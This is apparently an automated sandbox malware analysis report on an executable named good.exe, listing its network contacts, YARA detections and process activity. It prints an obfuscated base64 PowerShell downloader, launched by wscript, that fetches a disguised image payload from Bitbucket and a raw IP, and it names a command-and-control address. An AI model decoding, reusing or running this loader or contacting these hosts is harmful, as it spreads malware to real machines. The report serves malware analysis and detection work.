                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: global trafficHTTP traffic detected: GET /dfghd/fgd/downloads/test.jpg?517613 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-4926-afc8-122cd28abbda/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNBTKKJY5M&Signature=WrRRG%2FjNv0KYJyVNvKxc%2BY6fR%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIHqlgISaXQZNWVdHrtqHFQM1aKdCCC5wz47mj8NtMH%2BIAiBdtBjgyJZ6tj7uXWFGVxbXJfoLZTyvi2A7sXwcgSrL%2BSqwAgio%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMFJaKkm%2Baexgdux4uKoQC6KXHopDQ%2FlrvHmoVWqroq7CEf10111jAHgCJB1MtIiwoslQvWwr%2B0TjbV0drvIlTQrZSoCEisB3EKyeKiSOdy4cG7zLV8sUpkCTFObt0YVdcZihx5WCNnElUd6Q0GtOsyOJ54uKNitBk4qLGC%2F8FLxoWB8Zd7GFtIhjBH6oiR29zWtJHxVJMEzbEk0X8I6ra5TJTAxAmj%2FGBrJRWzhpL7djvH%2BWsC9IJL3xndZ130rjzzEn3Hy0dMH4Ffr76tlD%2FuZUeGrYyghPc8SyR5fqjbJHN3e9nSOiKDWOIXmDqOsRdlmX0FjNbG66IlTsda3suu%2BoRn1c7bGtYzOEXJO6jQojgYsEwsMC5vAY6ngHasjGz4hS4AfIgJXweXhdRz1bV7MycPu%2FtoygR37IQAI2SIbv%2BJt7FUa41kbstbCnTf83poZhHfI9%2FRbWfaSYmj1qK922%2BqxSm9MABVAMkZx5JZm3rwCcg5wX1F4OziYeFQ62%2FCrMOCBR0WPCJ7vRvmPaibga1Dr8iVpJAsA4gu4VzYUGceXMrIg71s6AQv9mhMr9BdNeEyZjX7FjkwQ%3D%3D&Expires=1737385784 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /public_files/kmAFAhc.txt HTTP/1.1Host: 62.60.226.64Connection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                    Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.60.226.64
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.60.226.64/public_files/kmAFAhc.txt
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.60.226.64/public_files/kmAFAhc.txtp
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AECDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000006.00000002.2324109491.000001E480094000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwMSFT_PriSmbServerCertificateMapping.cdxml
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsof.
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsof..Diah
                    Source: fontdrvhost.exe, 0000000C.00000002.2036496891.0000000002ADC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1
                    Source: fontdrvhost.exe, 0000000C.00000002.2036496891.0000000002ADC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1x
                    Source: powershell.exe, 00000006.00000002.2324109491.000001E48006A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2324109491.000001E48004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                    Source: powershell.exe, 00000006.00000002.2324109491.000001E4805B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2373492647.000001E4F3E85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993675300.00000263A89B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993297544.00000263A87C6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993120651.00000263A8752000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AECC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993120651.00000263A8740000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993869124.00000263AA310000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AECDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 54.231.134.241:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_5ab7c9fd-1
                    Source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_dea959b2-a
                    Source: Yara matchFile source: 12.3.fontdrvhost.exe.5120000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.3.fontdrvhost.exe.5340000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.3.fontdrvhost.exe.5340000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 3384, type: MEMORYSTR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@D
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@DJump to behavior
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731912C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF731912C54
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731911C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF731911C0C
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319166C40_2_00007FF7319166C4
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319140C40_2_00007FF7319140C4
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731916CA40_2_00007FF731916CA4
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731912DB40_2_00007FF731912DB4
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731911D280_2_00007FF731911D28
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731915D900_2_00007FF731915D90
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731911C0C0_2_00007FF731911C0C
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319135300_2_00007FF731913530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 676
                    Source: good.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5962 bytes, 1 file, at 0x2c +A "fwr.vbs", ID 712, number 1, 1 datablock, 0x1503 compression
                    Source: good.exeBinary or memory string: OriginalFilename vs good.exe
                    Source: good.exe, 00000000.00000000.1684038930.00007FF73191E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE D vs good.exe
                    Source: good.exe, 00000000.00000000.1684038930.00007FF73191E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs good.exe
                    Source: good.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE D vs good.exe
                    Source: good.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs good.exe
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5168
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5168Jump to behavior
                    Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 10.2.powershell.exe.263aa440000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                    Source: 10.2.powershell.exe.263aa440000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
